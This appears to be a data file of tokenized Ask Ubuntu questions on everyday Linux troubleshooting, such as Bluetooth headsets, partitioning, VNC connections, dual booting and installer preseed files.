497614	how to use a computer as a bluetooth headset ?	i have very little bluetooth expertize . all i want to do is to occasionally be able to use my computer 's speakers and microphone for phone conversations . i do n't want to use a bluetooth headset . all tutorials i can find on the net are either dated for ubuntu 12.04 at the very latest , or describe the process of connecting to the bluetooth headset . i have ubuntu 14.04 64bit asus n56vz notebook with built-in bluetooth device , that works well under ubuntu . my phone is nokia 6310i , and is compatible with bluetooth headsets . i know how to connect this phone to the dedicated headset . i just do n't know how to connect it to my notebook for the same purpose . when i initiate connection from my mobile to the notebook , or initiate connection from my notebook to the mobile or just turn off the bluetooth and the mobile altogether i 've got the same , list sources ( obtained via pactl list sinks and pactl list sources and filtering out all other fields ) : sink # 0 name : alsa_output.pci-0000_00_1b.0.analog-stereo source # 0 name : alsa_output.pci-0000_00_1b.0.analog-stereo.monitor source # 1 name : alsa_input.pci-0000_00_1b.0.analog-stereo i guess one do n't `` just connect '' to the mobile without some extra preparation . the connection connects , and after a second disconnects . i guess i need to make the computer to advertise itself as a headset , otherwise the phone might think it is something different and it does n't want to deal with it . this is my /etc/bluetooth/audio.conf . by manipulating its contents i never saw any effect ( and of course i did reboot after each change ) , so maybe this file is depreciated . or the effects are too subtle for me to see . [ general ] autoconnect=true enable = sink , source , gateway [ headset ] hfp=true maxconnected=1 fastconnectable=false [ a2dp ] sbcsources=1 mpeg12sources=0
497615	/sys/class/baclight folder is empty , leading to blank screen	i recently tried to change the default brightness of my ubuntu by echoing values to /sys/class/backlight/acpi_video0/brightness , and installing xbacklight , as suggested by answers to other questions . however , after booting ubuntu after doing the above , the screen just went blank . after further checking , i found /sys/class/backlight folder is empty , and i have not been able to add a folder even under root permissions .
497619	apache start error	root @ subbu : /usr/local/apache2/bin # apachectl -k start apache2 : could not open configuration file /etc/apache2/apache2.conf : no such file or directory action '-k start ' failed . the apache error log may have more information .
497625	problem with partitioning	i have a problem trying to partition my hard drive . i recently installed ubuntu , to find out if i have a problem with the internet connection on my pc , since the windows i was using could n't connect to the local area . after i deleted windows and installed ubuntu i did n't select partitions and just installed it . now i ca n't reinstall windows since it is saying that all the hard drive is used on ubuntu and that i have no free space left . i tried creating partitions with gparted and the gparted live cd , but i ca n't find a way to create partitions since it says it is all being used . i am sure it 's my fault since i did n't select root , swap and home , but i ca n't find a way to fix that . in gparted i have the following information : /dev/sda1 ext2 /boot 243.00mib 74.84mib used 170.16mib are n't used /dev/sda1 extended 931.27gib /dev/sda5 lvm2pv ubuntu-vg 931.27gib 931.23gib used 44mib are n't used i hope the information helps . if you need any more info , please tell me .
497626	display user and folders for disk usage	i am trying to list out from the servers , and i was wondering if it is possible to be done through any terminal coding ( in which i am pretty weak in it now ) example , in the main directory there are tons of sub-folders ( level 2 ) and within them are also tons of sub folders ( level 3 deep ? ) as such , i was wondering if normal coding in the terminal will gives me : which user is occupying the most space ( level 3 deep ) , while displaying the folders as well the top 10 people that is occupying the most space ( level 2 deep ) main directory : |- sub_lvl_2_a |- sub_lvl_3_a |- sub_lvl_2_b |- sub_lvl_3_b |- sub_lvl_3_c
497627	i have installed ubuntu 14.04 on my sony vaio vgn-t37gp but it runs slow	i have installed ubuntu 14.04 but it runs very slow . whenever i open any window like `` dash home '' or `` firefox '' , it takes more time than another computer . graphics of my sony vaio : - intel速 852gm/855gm x86/mmx/sse2
497634	cloning sd card 4gb to sd card 8gb	i need the whole system , all scheduled data , settings , and overall everything i have on the sd card ( linux ) with 4gb convert to another sd card . how can i do this ? my notebook have ubuntu . both cards in my pc . old card ( 4gb ) : / dev/mmcblk0 new card ( 8gb ) : / dev/sda1
497637	dual-monitor setup ; one monitor changes to low resolution	dear askubuntu community , i am using ubuntu 13.10 at work with dual-monitor display . one has 1920x1080 resolution and the other 2560x1440 ( main ) , the graphics card is radeon 7570 1gb . the main high resolution monitor ( which is connected with displayport ) has following issues : sometimes during boot-up or suddenly in the middle of my work ( using r or python , different web tools ) the monitor flickers for 2-3 seconds and goes into low-resolution mode . additionally , it forgets that it 's the main one ( on the right side ) and switches its desktop like it was set up as the left-side monitor . all i need to do to get it back to work is to click on `` displays '' options in the taskbar , not even change anything , just enter the options . it clicks back to its original position and resolution . as you can imagine , it 's pretty annoying . any ideas on where i could change options ? or could it be a faulty displayport cable ? i think it started to happen after a colleague of mine pulled out a cable during ubuntu working to exchange cables . could some properties get corrupted in the config ? best regards , piotr
497641	printer sharing on samba server between windows and linux	am a beginner on samba server and networking . i 've installed a printer canon pixma mp230 series on windows vista , and shared the printer over the network . on my ubuntu pc , am trying to use this printer and print a doc from my ubuntu pc . the problems are : 1- i do not and cant find the driver for this printer for linux arm version . 2- i cant see/discover the printer installed on windows vista . ( saw i tutorial how to by adding python ) . but i dont want to add the same solution to all win pcs . can anyone advice please ? best regards
497643	12.04 wifi signal very weak	ii am new people in ubuntu i am using 12.04 version , but my wifi signal very weak my router beside me only , my signal also only 50 % ... anybody know how to fix it ? i have try to research solution , but fail . any one can tell me how to increase my wifi signal ? thank you .
497646	usb disk - auto mount options	i 'm unable to find out , what exactly happens when usb flash disc is inserted . and i want to add `` noatime '' option for flash drive . i have read this : https : //help.ubuntu.com/community/automaticallymountpartitions and `` man udisks '' i thing , that aoutomounting in ubuntu 12.04 is served by udev and/or ( ? ) udisks , but ca n't find how to change/configure what should happen . i feel myself more and more like in windows - i loose control and i do not know , `` how things works '' . thanks for any help : - )
497650	lubuntu 14.04 linksys wpc54gx4 wireless adapter not working	i am on lubuntu 14.04 ; my ethernet is working but not my wifi . the system will not recognize my linksys wpc54gx4 wireless-g adapter ( a pcmcia card ) .
497651	audacity audio problems since upgrade to 14.04	i was successfully using audacity to record from vinyl via a terratec phone preamp under precise pangolin . after upgrading to trusty tahr , not only was the sound signal massively reduced but it was overlaid with loud `` digital '' clicks , i.e nothing like record noise . i could n't figure out what would have changed apart from the operating system or its defaults . i have since found that you need to use the system volume control to get the loudest sound below `` clipping '' ( distortion ) level and if you are getting the unbearable noise that i was , you must disable `` software playthrough '' . i do n't know why this was n't a problem before , but at least i can get stuff digitised again .
497653	wired connection problem ubuntu 12.04 lts	i am not new to ubuntu , but have encountered this problem several times . i am running with a wired connection on ubuntu 12.04 lts . when i worked with ubuntu for the first two- three weeks or so , the connection seemed to work fine , and i had n't even set up the connection- it had been auto-detected by ubuntu , which is natural . but now , the connection seems to have not working ( its not detecting at all ) . on repeatedly restarting my computer , i found that the internet seeme to connect ( or detect ) , like 1 out of 5-8 restarts . is there any solution to this unusual problem , as i have tried all the solutions on this site and other sites too , but have not found a working solution . on my other partition on windows vista , this problem never occurs and the internet connection alway connects . ps : if there is any extra info i have to provide like error logs or any other info just tell me and i will do so , as i desperately want a solution . output for sudo lshw -c network- *-network description : ethernet interface product : nm10/ich7 family lan controller vendor : intel corporation physical id : 8 bus info : pci @ 0000:01:08.0 logical name : eth0 version : 01 serial : 00:1a:92:6b:2e : b1 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full firmware=n/a ip=10.0.0.2 latency=32 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:20 memory : fdefe000-fdefefff ioport : ee00 ( size=64 ) output for cat /var/log/dmesg | grep eth0 - [ 1.199914 ] e100 0000:01:08.0 : eth0 : addr 0xfdefe000 , irq 20 , mac addr 00:1a:92:6b:2e : b1 [ 18.108866 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 19.317182 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 19.317593 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 19.320152 ] e100 0000:01:08.0 : eth0 : nic link is up 100 mbps full duplex [ 19.320401 ] addrconf ( netdev_change ) : eth0 : link becomes ready
497660	dual boot windows 8 - ubuntu 14 : gpt destruction with gdisk , computer no more starts	i just bought a new asus computer with windows 8 pre-installed ( so uefi and secure boot activated ) and it is no more working since i did a mistake with gdisk : i wanted to install ubuntu alongside windows8 in uefi mode , but the option did not appear in the ubuntu installer ( `` install ubuntu alongside windows '' ) . so i decided ( bad decision i suppose ) to use gdisk in expert mode ( x option ) , and i did `` z '' option : `` zap ( destroy ) gpt data structures and exit '' by hoping i will have the `` install alongside windows '' option in the installer . and now , each time i start computer , the bios ( uefi ) appears , and the pc block on it , windows 8 no more starts . please can you give me a solution to restore gpt partiton table ? thank you in advance . sylvain
497666	logitech mouse and keyboard click issues	i have a logitech k360 keyboard and k325 mouse on my ubuntu 12.04 desktop . these had been working out of the box for a while , but recently they started acting up . for example , if i open up chrome , the mouse and keyboard suddenly stop working . i can still move the cursor , it just wo n't click on anything . also atl+tab ( to switch applications ) on my keyboard stops working . i downloaded solaar thinking maybe putting both devices on one unifying receiver would help , but same thing . does anyone have any ideas ? before you point me to the direction of this question , i have already tried this , plus my mouse is being recognized , just not behaving properly . thanks in advance . p.s . i have no idea why this would matter , but i recently put transmission-gtk -- minimized as a startup application . the mouse and keyboard really started acting up then .
497668	huge problem with linux distributions	i have a question , please help me out . so , i ca n't install debian based distributions on the pc . i 've tried to install elementary os isis , ubuntu 14.04 , linux mint 17 , xubuntu 14.04 , kubuntu 14.04 nothing works . first of all i ca n't even open installation window . when i plug in a bootable usb and try to boot it , the screen flashes and.. does n't do anything . the only way to open installation wizard is to press tab > f6 and edit boot line by adding command `` nomodeset '' , but after installation goes reboot ... after that the os does not start correctly . i only see a bunch of colorful lines . windows 8 installs without any errors . pc is quite old . e4400 core duo cpu , 1.5gb of ram , and gt430 video card by gigabyte , motherboard msi - ms-7258 . i have no clue what 's happening here , i 've spent all day trying different distros . sorry for fast typing.. i 'm frustrated , i have no idea which distro might work.. pc is not mine , friend of mine asked for linux , and it seems he will have to stay with windows . strange thing , installation on my both pcs was fluent ( linux mint 17 ) oh one more thing elementary os worked for short period of time , it worked while i 've installed updates , rebooted it worked.. installed nvidia drivers 331.38 rebooted and after reboot screen with colorful lines appeared .
497669	backup says nas target too small , but it 's not	using the backups program on 14.04 lts ( which i believe is what used to be deja dup ) i get the error that the backup location is too small . but the backup is pointed to a `` local folder '' which is a mount of a share on a nas drive that has over a terabyte available , and i 'm only backing up maybe 30gb . any ideas ?
497675	hard drive partations mount problem	when i tried to access my partition then i found the following message : error mounting /dev/sda4 at /media/pc/16564b1c564afbcd : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda4 '' `` /media/pc/16564b1c564afbcd '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda4 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . '' please help me to solve this problem .
497676	replace black screen/kernel text compiling with image	does anyone know of a method or program that allows you no display an image instead of the black screen/compiling text that is normally displayed while booting ? thanks
497679	script to logout root and login user	i was wondering if there was a way to make a script that logouts of root or takes the automatic root login and logs in a user . this is for security reason so that the user can not change important files . i am using ubuntu 12.04 or a emb-3500 freescale board ( i.mx6 chip ) ( arm ) . note* i do not have a bootloader or inittab file . my opening console that logs in as root is ttymxc0 which is specific to the board .
497685	difference between apt-cache and axi-cache	what is the difference between apt-cache and axi-cache ? because it seems they gives same result . also it has same options like : axi-cache search , apt-cache search axi-cache show , apt-cache show axi-cache depends , apt-cache depends axi-cache showpkg , apt-cache showpkg etc . from man apt-cache : apt-cache - query the apt cache & from man axi-cache : axi-cache - query the apt xapian index so , what is difference in apt cache and apt xapian index ? what is xapian index ( stand for , how used , how differs with apt-cache ) ?
497686	14.04 hp dv7 fan speed wont increase	my laptop hp pavilion dv7-7030us wont increase the fan speed . it gets quite hot ( up to around 70c ) but the fan speed wont increase at all . with windows 7 i never had a overheating problem and also with 13.04 i think . i have lm-sensor installed but i dont think its working right . also im quite new with linux . i can provide any additional info needed and might have to tell me how to get it from terminal . also when i tried pwmconfig it said that were were no pwm-capable sensor modules installed .
497688	xorg server intermittently freezes	the bug in a nutshell : the system will randomly freeze up , anywhere from 2-5 seconds at a time , fairly frequently . so this issue started with the installation of a new gpu ( geforce 760 ) over the weekend . i already had one in there - worked for months ( including the 13.10- > 14.04 upgrade ) without issue . the new one is n't the primary , since running 2 monitors per gpu ( 4 head setup ) only yields 3 usable displays . i 've attempted a reinstall from scratch ( /home is on a separate hard drive , so all user data is still there ) . anyway , back to the problem . gnome is my desktop of choice , although the issue also presents itself on unity . i 've got no idea what 's causing the issue - memory is 15+gb free , cpu is stable/not increasing when it happens . it 's the same gpu chipset that has been used for a while , so drivers should n't be the problem . update : this seems to be related to the mouse , if i leave it alone and only use the keyboard , nothing freezes . i 've tried swapping out for another mouse , no improvement . 2nd update : this was caused by the second gtx 760 card that was added . it seems the mouse was only a trigger for it , replacing the card with a lower end one resolved the issue completely . i 'm still interested in knowing why this kept happening even with proprietary drivers . any ideas or pointers here ?
497691	how to add windows 8 boot entry to grub2 ?	how to add windows 8 boot entry to grub2 ? i had windows 7 installed on my primary ( and active ) partition and windows 8 installed on partition 2 which is logical and not active . now i installed ubuntu 14.04 on my primary partition by formatting it to ext3 file format . the installation succeeded and ubuntu is running fine . but now the problem is it does n't shows any grub menu to boot windows . i tried to reinstall windows to primary partition but the installer ( windows 8 installation dvd ) is not recognizing the file format of primary partition . even `` bootrec.exe /fixboot '' command is not working because the primary partition is now ext3 . please tell a way to dual-boot windows and ubuntu or install back windows to primary partition .
497692	low battery life in ubuntu 14.04	i did a clean install of ubuntu 14.04 , along dual booting windows 7 . i love ubuntu but then suddenly the power went out and the next thing i know my battery ran out of juice in less than 30 minutes . usually my battery lasts for 3 hours with windows 7 , but on ubuntu its considerably less please give me some advice .
497699	how to run sequence of command at startup ?	i need to run a sequence of command at the startup . this sequence require the root password as well . how can i do that ? this is in particular the sequence of command that i need to run : virginia @ asus-f552cl : ~ $ cd mt7630e_wi-fi_bt_source_release_20140625/rt2x00/ virginia @ asus-f552cl : ~/mt7630e_wi-fi_bt_source_release_20140625/rt2x00 $ sudo su [ sudo ] password for virginia : root @ asus-f552cl : /home/virginia/mt7630e_wi-fi_bt_source_release_20140625/rt2x00 # ./load.sh root @ asus-f552cl : /home/virginia/mt7630e_wi-fi_bt_source_release_20140625/rt2x00 # exit virginia @ asus-f552cl : ~/mt7630e_wi-fi_bt_source_release_20140625/rt2x00 $
497702	oem version of ubuntu 14.04	i was wondering if there is an oem version of ubuntu like that of windows which has nothing but the necessities to operate . ( ex no add-ins or any thing of the likes .
497706	unity suddenly broken	all of a sudden , unity is broken on ubuntu 14.04 . after the logging screen , i can see the desktop but there are no unity panel and no top taskbar . i tried to boot in recovery mode but i ca n't access the menu by holding `` shift '' or `` esc '' from boot . how can i repair unity ? note : on guest session , unity is working .
497709	juju-quickstart : error : bad api response : can not upload charm to provider storage : 500 inkapi error	i have been able to use juju from my home machine , however , when i attempt to use it from my work machine ( which sits behind a proxy ) i get : ( output from juju quickstart -- debug ) retrieving the juju api address 10:06:20 debug utils @ call:94 running the following : /usr/bin/juju api-endpoints -e local -- format json 10:06:21 debug utils @ call:104 retcode : 0 | output : ' [ `` 10.0.3.1:17070 '' ] \n ' | error : '' connecting to wss : //10.0.3.1:17070 10:06:21 debug juju @ send:130 api message : -- > { `` request '' : `` login '' , `` params '' : { `` password '' : `` password '' , `` authtag '' : `` user-admin '' } , `` type '' : `` admin '' , `` requestid '' : 0 } 10:06:21 debug juju @ recv:139 api message : < -- { `` requestid '' :0 , '' response '' : { } } requesting juju-gui deployment charm url : cs : precise/juju-gui-92 10:06:21 debug juju @ send:130 api message : -- > { `` request '' : `` servicedeploy '' , `` params '' : { `` charmurl '' : `` cs : precise/juju-gui-92 '' , `` numunits '' : 0 , `` tomachinespec '' : null , `` servicename '' : `` juju-gui '' , `` config '' : { } , `` constraints '' : { } } , `` type '' : `` client '' , `` requestid '' : 1 } 10:06:41 debug juju @ recv:139 api message : < -- { `` requestid '' :1 , '' error '' : '' can not upload charm to provider storage : 500 500 inkapi error '' , '' response '' : { } } juju-quickstart : error : bad api response : can not upload charm to provider storage : 500 500 inkapi error error exit status 1 my .bashrc is set as : export http_proxy= '' http : //proxy.mycompany.com:8080 '' export https_proxy= '' http : //proxy.mycompany.com:8080 '' export ftp_proxy= '' http : //proxy.mycompany.com:8080 '' export http_proxy= '' http : //proxy.mycompany.com:8080 '' export https_proxy= '' http : //proxy.mycompany.com:8080 '' export ftp_proxy= '' http : //proxy.mycompany.com:8080 '' export no_proxy= '' localhost,127.0.0.1 '' export no_proxy= '' localhost,127.0.0.1 '' i have the proxy also set in /etc/default/lxc ( for both , mirror and security_mirror ) and verified lxc works . when i run juju quickstart i create a new lxc local environment and i use defaults . this is installed on a bare ubuntu 64-bit 14.04 install with the latest updates and juju-local and juju-quickstart packages . this also occurs if i try to deploy a local charm .
497710	how do i use multiple laptops as external display over network ?	i have a relatively powerful computer ( 8gb ram , 64bit , quad core ) and i can easily drive three monitors , my tv over hdmi , my 17 inch hd internal laptop display , and an external hd display . i have ( literally ) 8 laptops , and only one vga port on my main one , and my tv is impossible to use much of the time . i really like the idea of using my wireless ( all of my computers have it ) to link them all and display all six of my desktops on my computer at once , or just have a 6 monitor extended desktop . how would i achieve this ? i do n't just want them to share my cursor , i want to be able to drag windows between them , too .
497714	problem to update bash profile	each time i work with a tool named criu , i set the path variable : path= $ path : /home/th/criu-1.3-rc2 ; export path to be able to run criu dump but when i close the terminal and open it , it does not work i update the : echo 'export path= $ path : /home/th/criu-1.3-rc2 ' > > ~/.bash_profile but the same problem persists
497715	ca n't connect to computer via vnc running x11vnc	i 've got a desktop computer and a laptop , both running ubuntu 14.04 . the desktop has x11vnc installed on it and my laptop has remmina . my desktop also has ssh running on it . i want to use remmina to connect via vnc to my desktop computer . i use to have the command x11vnc -usepw -forever set to run on startup , but i disabled it . now i want to set it to run on startup again . here is the problem though : when i use ssh to run x11vnc -usepw -forever , i get an interesting error on the computer running x11vnc ( what i want to connect to ) . the error is below . p.s . my laptop 's ip address is 10.0.0.7 . 14/07/2014 13:21:08 got connection from client 10.0.0.7 14/07/2014 13:21:08 other clients : 14/07/2014 13:21:08 normal socket connection 14/07/2014 13:21:08 disabled x server key autorepeat . 14/07/2014 13:21:08 to force back on run : 'xset r on ' ( 3 times ) 14/07/2014 13:21:08 incr accepted_client=1 for 10.0.0.7:36678 sock=11 14/07/2014 13:21:08 client protocol version 3.8 14/07/2014 13:21:08 protocol version sent 3.8 , using 3.8 14/07/2014 13:21:08 rfbprocessclientsecuritytype : executing handler for type 2 14/07/2014 13:21:08 authprocessclientmessage : authentication failed from 10.0.0.7 14/07/2014 13:21:08 rfbauthprocessclientmessage : password check failed 14/07/2014 13:21:08 rfbclientsendstring ( `` password check failed ! '' ) 14/07/2014 13:21:08 client_count : 0 14/07/2014 13:21:08 restored x server key autorepeat to : 1 14/07/2014 13:21:08 client 10.0.0.7 gone 14/07/2014 13:21:08 statistics events transmit/ rawequiv ( saved ) 14/07/2014 13:21:08 totals : 0 | 0/ 0 ( 0.0 % ) 14/07/2014 13:21:08 statistics events received/ rawequiv ( saved ) 14/07/2014 13:21:08 totals : 0 | 0/ 0 ( 0.0 % ) 14/07/2014 13:21:10 got connection from client 10.0.0.7 14/07/2014 13:21:10 other clients : 14/07/2014 13:21:10 normal socket connection 14/07/2014 13:21:10 disabled x server key autorepeat . 14/07/2014 13:21:10 to force back on run : 'xset r on ' ( 3 times ) 14/07/2014 13:21:10 incr accepted_client=2 for 10.0.0.7:36679 sock=11 14/07/2014 13:21:10 client protocol version 3.8 14/07/2014 13:21:10 protocol version sent 3.8 , using 3.8 14/07/2014 13:21:10 rfbprocessclientsecuritytype : executing handler for type 2 14/07/2014 13:21:11 created xdamage object : 0x1e00024 14/07/2014 13:21:16 client usecopyrect : 10.0.0.7 0 14/07/2014 13:21:16 client_set_net : 10.0.0.7 0.0243 14/07/2014 13:21:16 pixel format for client 10.0.0.7 : 14/07/2014 13:21:16 8 bpp , depth 8 14/07/2014 13:21:16 true colour : max r 7 g 7 b 3 , shift r 0 g 3 b 6 14/07/2014 13:21:16 rfbprocessclientnormalmessage : ignoring unsupported encoding type ultrazip 14/07/2014 13:21:16 using compression level 9 for client 10.0.0.7 14/07/2014 13:21:16 using image quality level 0 for client 10.0.0.7 14/07/2014 13:21:16 using jpeg subsampling 1 , q15 for client 10.0.0.7 14/07/2014 13:21:16 enabling x-style cursor updates for client 10.0.0.7 14/07/2014 13:21:16 enabling full-color cursor updates for client 10.0.0.7 14/07/2014 13:21:16 enabling cursor position updates for client 10.0.0.7 14/07/2014 13:21:16 enabling keyboardledstate protocol extension for client 10.0.0.7 14/07/2014 13:21:16 enabling newfbsize protocol extension for client 10.0.0.7 14/07/2014 13:21:16 enabling lastrect protocol extension for client 10.0.0.7 14/07/2014 13:21:16 enabling supportedmessages protocol extension for client 10.0.0.7 14/07/2014 13:21:16 enabling supportedencodings protocol extension for client 10.0.0.7 14/07/2014 13:21:16 enabling serveridentity protocol extension for client 10.0.0.7 14/07/2014 13:21:16 using tight encoding for client 10.0.0.7 14/07/2014 13:21:16 rfbprocessclientnormalmessage : read : connection reset by peer 14/07/2014 13:21:16 client_count : 0 14/07/2014 13:21:16 restored x server key autorepeat to : 1 14/07/2014 13:21:16 client 10.0.0.7 gone
497716	mplayer - osd/subtitles in audiofiles with album art	is it possible to make osd and subtitles work in audio-only files ( mp3 , flac etc . ) that have a cover art image file ? i mean : the timing and other things of osd , and the subtitles that i have in a srt file . if i run mplayer foo.flac -osdlevel 2 , the timing is shown but keeps frozen at 0:00:00 ( while the audio goes on ) . if i add -sub foo.srt , nothing happens . in both cases , pause does n't work . [ vdpau ] error when calling vdp_device_create_x11 : 1 [ ass ] auto-open selected video codec : png ( portable network graphics ) image [ libavcodec ] selected audio codec : flac ( free lossless audio codec ) [ libavcodec ] audio : 44100 hz , 2 ch , s16le , 0.0 kbit/0.00 % ( ratio : 0- > 176400 ) ao : [ pulse ] 44100hz 2ch s16le ( 2 bytes per sample ) starting playback ... video : 1500x1500 90000.000 fps 0.0 kbps ( 0.0 kb/s ) could not find matching colorspace - retrying with -vf scale ... opening video filter : [ scale ] [ swscaler @ 0xb6536920 ] bicubic scaler , from rgb24 to yuv420p using mmxext vo : [ xv ] 1500x1500 = > 1500x1500 planar yv12 no pts value from demuxer to use for frame ! video pts after filters missing version : mplayer2 2.0-701-gd4c5b7f-2ubuntu2 ( c ) 2000-2012 mplayer team
497717	unity lens google chrome icon will not go away	i was watching a youtube video , and quit chrome . for some reason , chrome saved itself as the youtube video name as in instead of google chrome , it is saved on the unity lens as `` three main reasons war is going away youtube-google chrome '' and i have tried to get rid of the icon by updating chrome , updating ubuntu , and uninstalling chrome , but the icon stays there . i can not open chrome , since it is obviously not installed anymore , but the icon is still there .
497719	installing efi to raid 1 using partman and seed file , on both drives	so my question is , is it possible to install the efi partition onto both drives when doing a seed install on ubuntu ? that way if one drive goes , the relevant efi partition/data is there on the second drive , and it can just boot off that . or is it only possible to install it to the first drive . here 's my working seed file to install it only to the first drive , setup raid 1 and lvm . but i 'd like to know how to do both d-i partman-md/device_remove_md boolean true d-i partman-lvm/device_remove_lvm boolean true d-i partman-lvm/confirm boolean true d-i partman-auto/disk string /dev/sda /dev/sdb d-i partman-auto/method string raid d-i partman-auto-lvm/new_vg_name string vg0 d-i partman-auto-lvm/guided_size string 90 % d-i partman-auto/expert_recipe string \ efi-lvm : : \ 1 1 1 free \ $ bios_boot { } \ method { biosgrub } \ . \ 256 10 256 fat32 \ $ primary { } \ $ lvmignore { } \ method { efi } \ format { } \ .\ 20000 30 1000000000 raid \ \ $ lvmignore { } \ \ $ primary { } \ method { raid } \ .\ 20000 50 400000 ext4 \ \ $ defaultignore { } \ \ $ lvmok { } \ lv_name { root } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { / } \ label { root } \ .\ 2048 40 2048 swap \ \ $ defaultignore { } \ \ $ lvmok { } \ lv_name { swap } \ method { swap } \ format { } \ . d-i partman-auto-raid/recipe string \ 1 2 0 lvm - /dev/sda2 # /dev/sdb2 \ . d-i partman-md/confirm boolean true d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish partitioning and write changes to disk d-i partman/confirm boolean true d-i partman-md/confirm_nooverwrite boolean true d-i partman/confirm_nooverwrite boolean true d-i mdadm/boot_degraded boolean true i also have the following in ny seed file to sum up the drives and trash any lvm bits . d-i partman/early_command \ string debconf-set partman-auto/disk `` \ $ ( list-devices disk | head -n1 ) '' d-i partman/early_command string vgs -separator= : -noheadings | cut -f1 -d : | while read vg ; do vgchange -an \ $ vg ; done ; pvs -separator= : -noheadings | cut -f1 -d : | while read pv ; do pvremove -ff -y \ $ pv ; done
497721	dual-boot : win7 partition loads without error , but display does n't work	i am having a strange dual-boot issue that i have n't been able to find an answer for anywhere . i have an ubuntu 14.04 box , which i have created a secondary partition on for win7 . my setup process : boot to ubuntu usb drive trial , shrink the ubuntu partition and create ntfs partition , restart boot to win7 cd , install , reboot , log into win7 fine , restart boot to ubuntu usb drive trial , run boot-repair , restart now i get a grub menu on startup , and can get into ubuntu no problem . however , trying to access win7 results in a blank 'purple ' screen ( color of grub screen ) , although i can hear the 'startup music ' of windows 7 . if i boot off the windows cd again , and run `` bootrec /fixboot '' from the command line , then i am able to reboot , choose win7 in grub , and get into it correctly . however , if at any point i go back into ubuntu , then afterwards i run into the same problem above when trying to access win7 unless i repeat the cd boot/bootrec step first . any ideas as to why accessing my ubuntu partition keeps rendering my win7 partition non-accessible ? further info : i tested , and it is not the selection to boot from ubuntu that causes the subsequent windows boot to fail . if i do two back-to-back windows boots , the one after the cd boot/bootrec works ( via a `` boot to safe mode or normally '' menu ) , and then the next one fails .
497723	ubuntu on a new hdd ?	is there anyway possible to install ubuntu on a new , blank hard drive , if yes can someone please tell me how ? my laptop broke and after i bought a new hdd which is a 2.5 sata , i 've asked people that i know who can provide me with a copy of windows 7 but none of them can , so i would like to get this os on my laptop for some time .
497724	another ubuntu-center crash ( re-formatted )	while upgrading from ubuntu 12.04 to 14.04 i received several ( 2-3 ) error messages which i allowed to communicate . after completing the upgrade , i tried to run software-center from the icon with no luck . then , i tried sudo-apt get update , sudo apt-get autoremove , i removed and re-installed software-center ( sudo apt-get remove software-center and sudo apt-get install software center ) but i keep getting the same error : ( copied from my terminal ) 2014-07-14 19:22:34,631 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-07-14 19:22:36,203 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2014-07-14 19:22:36,203 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 74 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 my guess is this could be caused by python ( i have got python2.7 and 3 installed by ubuntu 14.04 plus parts of an old python3.4 installation made by myself on ubuntu12.04 ) . any help would be appreciated .
497725	having a hard time intalling apps	so i did a full install of ubuntu and i have been having a hard time installing apps through ppa . whenever i go through terminal to install it always hangs at connecting to us . archive.ubuntu.com ( 2001:67c:1562 : :14 ) and if it does get past that then it says i must run sudo dpkg -- configure -a manually but when i do nothing happens . im using ubuntu 14.04 edit i cant even download through the software center . does anybody know what this could be ?
497727	error message at startup	i just installed ubuntu on my gateway ne56r41u yesterday . infact , it dual-boots with windows 8.1 uefi , but that has nothing to do with my problem . however , when i turn on my computer , i get an error message that displays for about a second . i do n't know what it means , though and it displays for less than a second . tell me , does it mean anything important ? how do i fix it ? also , regardless of if it 's important or not or if it is fixable , how can i prevent the message from displaying when i turn my computer on ? the error is below : [ 10.987 ] info @ wl_cfg80211_attach cfg80211 phy
